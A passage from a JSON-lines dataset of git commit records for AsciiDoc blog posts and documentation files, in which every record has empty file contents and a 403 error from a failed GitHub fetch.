2016-02-20-Test-Blog-using-Ascii-Doctor.adoc","repos":"bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io","old_file":"_posts\/2016-02-20-Test-Blog-using-Ascii-Doctor.adoc","new_file":"_posts\/2016-02-20-Test-Blog-using-Ascii-Doctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bigkahuna1uk\/bigkahuna1uk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e12553f276f6e6d1b0fbe57af926456c13645c8e","subject":"Update 2016-01-28-CDI-Vette-truukjes-met-Instance.adoc","message":"Update 2016-01-28-CDI-Vette-truukjes-met-Instance.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-01-28-CDI-Vette-truukjes-met-Instance.adoc","new_file":"_posts\/2016-01-28-CDI-Vette-truukjes-met-Instance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d67076dc603c9b51e96cb1550eedb784b0629b99","subject":"Removing colors from reports","message":"Removing colors from reports\n","repos":"korczis\/gooddata-ruby-examples,korczis\/gooddata-ruby-examples","old_file":"08_working_with_reports\/resetting_color_mapping.asciidoc","new_file":"08_working_with_reports\/resetting_color_mapping.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/korczis\/gooddata-ruby-examples.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"61f7ac646d2bc0b477e17f1671e74fd13fbe412e","subject":"Update 2016-09-innovation-Engineer-Aruaru.adoc","message":"Update 2016-09-innovation-Engineer-Aruaru.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-innovation-Engineer-Aruaru.adoc","new_file":"_posts\/2016-09-innovation-Engineer-Aruaru.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2bc9948d36b2965d10e4632be9c8300b05756a56","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb9f3b9e782fa7d728e4a3f4d214442b959b38ae","subject":"Update 2017-03-15-WISSENSCHAFT-PUBLIKATION.adoc","message":"Update 2017-03-15-WISSENSCHAFT-PUBLIKATION.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-03-15-WISSENSCHAFT-PUBLIKATION.adoc","new_file":"_posts\/2017-03-15-WISSENSCHAFT-PUBLIKATION.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75d303085dbdcc9dc4fb6314c5b0b68fc9a029dd","subject":"y2b create post Samsung Galaxy S8 Review","message":"y2b create post Samsung Galaxy S8 Review","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-08-Samsung-Galaxy-S8-Review.adoc","new_file":"_posts\/2017-04-08-Samsung-Galaxy-S8-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f5ec0fa303539ff4327cea61859c444bc81f52bb","subject":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","message":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f41fb745b8a93e5e759c685499b238ce0794960","subject":"y2b create post Unboxing The Ultra Rare Nintendo Jordans (The Buttons Actually Click!)","message":"y2b create post Unboxing The Ultra Rare Nintendo Jordans (The Buttons Actually Click!)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-08-19-Unboxing-The-Ultra-Rare-Nintendo-Jordans-The-Buttons-Actually-Click.adoc","new_file":"_posts\/2017-08-19-Unboxing-The-Ultra-Rare-Nintendo-Jordans-The-Buttons-Actually-Click.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b82b304b73274c4125354ed560d5b75831ef6f3","subject":"Update 2017-05-06-Migrate-Images-to-Sonata-Media.adoc","message":"Update 2017-05-06-Migrate-Images-to-Sonata-Media.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-06-Migrate-Images-to-Sonata-Media.adoc","new_file":"_posts\/2017-05-06-Migrate-Images-to-Sonata-Media.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94b19bb38e10d09fb31670e2dd21eb595289fa1a","subject":"Update 2017-03-15-Hadoop-un-etat-des-lieux.adoc","message":"Update 2017-03-15-Hadoop-un-etat-des-lieux.adoc","repos":"Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io","old_file":"_posts\/2017-03-15-Hadoop-un-etat-des-lieux.adoc","new_file":"_posts\/2017-03-15-Hadoop-un-etat-des-lieux.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ardemius\/ardemius.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0761824cb2a1d6759b2b48bcd8b8591212fb5f8a","subject":"Kafka Json Webflux","message":"Kafka Json Webflux\n","repos":"mikrethor\/blog,mikrethor\/blog,mikrethor\/blog","old_file":"_posts\/2022-07-17-Kafka-Json-Serialization.adoc","new_file":"_posts\/2022-07-17-Kafka-Json-Serialization.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikrethor\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57075f5fbcaaefdddad4c60ec936087dbc59bafa","subject":"Vorgehen Verf\u00fcgbarkeit hinzugef\u00fcgt","message":"Vorgehen Verf\u00fcgbarkeit hinzugef\u00fcgt\n","repos":"arc42\/quality-requirements","old_file":"src\/asciidoc\/05_zuverlaessigkeit_herangehensweise_verfuegbarkeit.adoc","new_file":"src\/asciidoc\/05_zuverlaessigkeit_herangehensweise_verfuegbarkeit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arc42\/quality-requirements.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ed0ac7682079ae16b7d4a6f3199358e2ea8ce4c9","subject":"Delete the file at '_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc'","message":"Delete the file at '_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc'","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","new_file":"_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23c9f248c07cbb621a18259cecf8d4dc6e0db2c0","subject":"Update 2018-06-24-Laravel56-Request.adoc","message":"Update 2018-06-24-Laravel56-Request.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-Laravel56-Request.adoc","new_file":"_posts\/2018-06-24-Laravel56-Request.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff535b521ec2cc80f4b430bf1feee842a3691f37","subject":"docs: clarify disk failure recovery administration","message":"docs: clarify disk failure recovery administration\n\nThis patch aims to clarify the disk failure scenarios that are currently\nhandled and what to do when one is encountered.\n\nFor a rendered version, see here:\nhttps:\/\/github.com\/andrwng\/kudu\/blob\/df_docs\/docs\/administration.adoc#disk_failure_recovery\n\nNote: the configuration link goes to a .html page instead of a .adoc\npage here:\nhttps:\/\/kudu.apache.org\/docs\/configuration.html#directory_configuration\n\nChange-Id: Idb362b277e104839a3aaaa3e94153e93f8b607b3\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/8811\nTested-by: Kudu Jenkins\nReviewed-by: Jean-Daniel Cryans <4bf4c125525b8623ac45dfd7774cbf531df19085@apache.org>\n","repos":"helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3e3f7d7a38bac177ece359f27cd63cd0a0ce60bc","subject":"doc faq: .ko build problems","message":"doc faq: .ko build problems\n\nChange-Id: I74d92348cbd4ebd3a5beb65be4ace49acac5c231\nSigned-off-by: Yaroslav Brustinov <58a360e80ce67a871f076847d255453a99d22580@cisco.com>\n","repos":"kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core","old_file":"doc\/trex_faq.asciidoc","new_file":"doc\/trex_faq.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"41fb540f3cae97648a02282ffb2cfd8f244273e3","subject":"Update 2016-02-26-Table-service-dining-coming-to-Diamond-Horseshoe.adoc","message":"Update 2016-02-26-Table-service-dining-coming-to-Diamond-Horseshoe.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-26-Table-service-dining-coming-to-Diamond-Horseshoe.adoc","new_file":"_posts\/2016-02-26-Table-service-dining-coming-to-Diamond-Horseshoe.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34a6eeb19d236a0f32392781e06638923130d268","subject":"Update 2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","message":"Update 2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","new_file":"_posts\/2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"939338b0a7918cca849b97e8082a5229b5c3ce5a","subject":"hello data rest","message":"hello data rest\n","repos":"mygithubwork\/boot-works,verydapeng\/boot-works,verydapeng\/boot-works,mygithubwork\/boot-works","old_file":"data-rest.adoc","new_file":"data-rest.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mygithubwork\/boot-works.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"51a8f0a5c87916ddc3fe23593fbd2dc61690028f","subject":"Update what-is-promise.adoc","message":"Update what-is-promise.adoc","repos":"liyunsheng\/promises-book,genie88\/promises-book,xifeiwu\/promises-book,oToUC\/promises-book,wenber\/promises-book,lidasong2014\/promises-book,dieface\/promises-book,xifeiwu\/promises-book,tangjinzhou\/promises-book,cqricky\/promises-book,lidasong2014\/promises-book,dieface\/promises-book,lidasong2014\/promises-book,tangjinzhou\/promises-book,cqricky\/promises-book,liubin\/promises-book,oToUC\/promises-book,liyunsheng\/promises-book,wenber\/promises-book,liubin\/promises-book,wenber\/promises-book,sunfurong\/promise,purepennons\/promises-book,genie88\/promises-book,mzbac\/promises-book,sunfurong\/promise,dieface\/promises-book,sunfurong\/promise,purepennons\/promises-book,oToUC\/promises-book,mzbac\/promises-book,xifeiwu\/promises-book,liyunsheng\/promises-book,cqricky\/promises-book,wangwei1237\/promises-book,wangwei1237\/promises-book,wangwei1237\/promises-book,genie88\/promises-book,liubin\/promises-book,mzbac\/promises-book,tangjinzhou\/promises-book,purepennons\/promises-book","old_file":"Ch1_WhatsPromises\/what-is-promise.adoc","new_file":"Ch1_WhatsPromises\/what-is-promise.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5a6776bc11d89d87a9d22f1386f85f219abaf12e","subject":"Update 2016-10-30-C-tips.adoc","message":"Update 2016-10-30-C-tips.adoc","repos":"remi-hernandez\/remi-hernandez.github.io,remi-hernandez\/remi-hernandez.github.io","old_file":"_posts\/2016-10-30-C-tips.adoc","new_file":"_posts\/2016-10-30-C-tips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remi-hernandez\/remi-hernandez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f73091dbdae2072a66918d4db3304a839ff84dbc","subject":"Update 2015-10-11-Maven-in-5-Minutes.adoc","message":"Update 2015-10-11-Maven-in-5-Minutes.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-11-Maven-in-5-Minutes.adoc","new_file":"_posts\/2015-10-11-Maven-in-5-Minutes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07c3029040b1e544887acf1e37d91bdb408fad3c","subject":"Update 2016-09-07-Farewell-G-So-C-16.adoc","message":"Update 2016-09-07-Farewell-G-So-C-16.adoc","repos":"erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016","old_file":"_posts\/2016-09-07-Farewell-G-So-C-16.adoc","new_file":"_posts\/2016-09-07-Farewell-G-So-C-16.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/erramuzpe\/gsoc2016.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d6c0d7d9fc3b9f9de0cdbe0cc87c9a8b2076ef1a","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d288703c53cd30e7c07085019a2a02b91a72a5f6","subject":"Update 2018-10-15-Firebase-Firestore.adoc","message":"Update 2018-10-15-Firebase-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-15-Firebase-Firestore.adoc","new_file":"_posts\/2018-10-15-Firebase-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b02b5b8a716db64a96b81ef898d61287e641c454","subject":"Remove reference to `accept_default_password` (#45533)","message":"Remove reference to `accept_default_password` (#45533)\n\n`xpack.security.authc.accept_default_password` has not been\r\n used since 6.0 but we still referenced it in our docs.","repos":"coding0011\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch","old_file":"docs\/reference\/settings\/security-settings.asciidoc","new_file":"docs\/reference\/settings\/security-settings.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e5e626f7f7b2b7831080f0b30a9933e2a086652b","subject":"Add missing link to Podman in documentation prerequisites","message":"Add missing link to Podman in documentation prerequisites\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/includes\/prerequisites.adoc","new_file":"docs\/src\/main\/asciidoc\/includes\/prerequisites.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9b9016f57bbd58d1943d4e0b143b9721b9085a50","subject":"Deleted 20161110-1232-showoff-zone.adoc","message":"Deleted 20161110-1232-showoff-zone.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"20161110-1232-showoff-zone.adoc","new_file":"20161110-1232-showoff-zone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3d53f82f79ad8f64794a505a5d0da7074a7d94a","subject":"NEW scenarios.adoc - for selenium-tests","message":"NEW scenarios.adoc - for selenium-tests\n","repos":"jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse","old_file":"documentation\/design_docs\/systemtests\/selenium-tests\/scenarios.adoc","new_file":"documentation\/design_docs\/systemtests\/selenium-tests\/scenarios.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenmalloy\/enmasse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e5b6bf98fc997f9db2cf0214379cffb3c8eea89d","subject":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","message":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2110c1bc2087e1097a4c06fa1f2dcc1cc6e77f60","subject":"Publish DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","message":"Publish DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","new_file":"DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57ee44c2fbfe60d6163f59a22cfde340094ae7e9","subject":"Update 2016-04-14-Introduccion-a-la-seguridad-fisica.adoc","message":"Update 2016-04-14-Introduccion-a-la-seguridad-fisica.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-14-Introduccion-a-la-seguridad-fisica.adoc","new_file":"_posts\/2016-04-14-Introduccion-a-la-seguridad-fisica.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab47daba0c7f1fc7d2501ad6c306ab077da4c00b","subject":"y2b create post Lacie Sound2 Speakers Unboxing \\u0026 Overview In HD!","message":"y2b create post Lacie Sound2 Speakers Unboxing \\u0026 Overview In HD!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-01-23-Lacie-Sound2-Speakers-Unboxing-u0026-Overview-In-HD.adoc","new_file":"_posts\/2011-01-23-Lacie-Sound2-Speakers-Unboxing-u0026-Overview-In-HD.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca7670fc71f93f4464e4f76ef76a0698d7fd7b70","subject":"Update 2016-02-04-Hallo-from-Tekk.adoc","message":"Update 2016-02-04-Hallo-from-Tekk.adoc","repos":"Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io","old_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mentaxification\/Mentaxification.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa22e233161dff4f6b1b45165c20b4081bb22f87","subject":"added breaking docs","message":"added breaking docs\n","repos":"jbertouch\/elasticsearch,kubum\/elasticsearch,skearns64\/elasticsearch,sreeramjayan\/elasticsearch,winstonewert\/elasticsearch,mute\/elasticsearch,gingerwizard\/elasticsearch,ulkas\/elasticsearch,wenpos\/elasticsearch,tebriel\/elasticsearch,sneivandt\/elasticsearch,obourgain\/elasticsearch,geidies\/elasticsearch,socialrank\/elasticsearch,Shekharrajak\/elasticsearch,huanzhong\/elasticsearch,vroyer\/elasticassandra,sarwarbhuiyan\/elasticsearch,nazarewk\/elasticsearch,njlawton\/elasticsearch,robin13\/elasticsearch,AndreKR\/elasticsearch,nazarewk\/elasticsearch,markwalkom\/elasticsearch,ThalaivaStars\/OrgRepo1,jpountz\/elasticsearch,KimTaehee\/elasticsearch,loconsolutions\/elasticsearch,Shekharrajak\/elasticsearch,tebriel\/elasticsearch,aglne\/elasticsearch,jsgao0\/elasticsearch,kaneshin\/elasticsearch,LeoYao\/elasticsearch,nellicus\/elasticsearch,beiske\/elasticsearch,kevinkluge\/elasticsearch,s1monw\/elasticsearch,kalimatas\/elasticsearch,mute\/elasticsearch,StefanGor\/elasticsearch,jbertouch\/elasticsearch,Collaborne\/elasticsearch,nezirus\/elasticsearch,TonyChai24\/ESSource,sc0ttkclark\/elasticsearch,Helen-Zhao\/elasticsearch,iamjakob\/elasticsearch,wbowling\/elasticsearch,Helen-Zhao\/elasticsearch,umeshdangat\/elasticsearch,IanvsPoplicola\/elasticsearch,kalimatas\/elasticsearch,mbrukman\/elasticsearch,sreeramjayan\/elasticsearch,ouyangkongtong\/elasticsearch,zkidkid\/elasticsearch,mmaracic\/elasticsearch,MaineC\/elasticsearch,TonyChai24\/ESSource,glefloch\/elasticsearch,iamjakob\/elasticsearch,nrkkalyan\/elasticsearch,lchennup\/elasticsearch,hydro2k\/elasticsearch,adrianbk\/elasticsearch,geidies\/elasticsearch,NBSW\/elasticsearch,onegambler\/elasticsearch,Brijeshrpatel9\/elasticsearch,yongminxia\/elasticsearch,onegambler\/elasticsearch,henakamaMSFT\/elasticsearch,alexshadow007\/elasticsearch,himanshuag\/elasticsearch,jsgao0\/elasticsearch,ricardocerq\/elasticsearch,maddin2016\/elasticsearch,weipinghe\/elasticsearch,himanshuag\/elasticsearch,hafkensite\/elasticsearch,rmuir\/elasticsearch,btiernay\/elasticsearch,MichaelLiZhou\/elasticsearch,umeshdangat\/elasticsearch,kalburgimanjunath\/elasticsearch,linglaiyao1314\